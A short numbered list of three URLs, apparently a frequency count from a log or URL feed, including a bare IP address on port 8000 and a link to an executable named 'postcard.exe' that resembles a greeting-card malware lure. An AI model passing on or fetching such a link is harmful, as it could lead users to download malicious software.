4 http://79.113.108.242:8000
3 http://ftp.reflectionspress.com/postcard/postcard.exe
2 http://sportpedia.mysport.ro/images/2/21/prepelita_andrei.jpg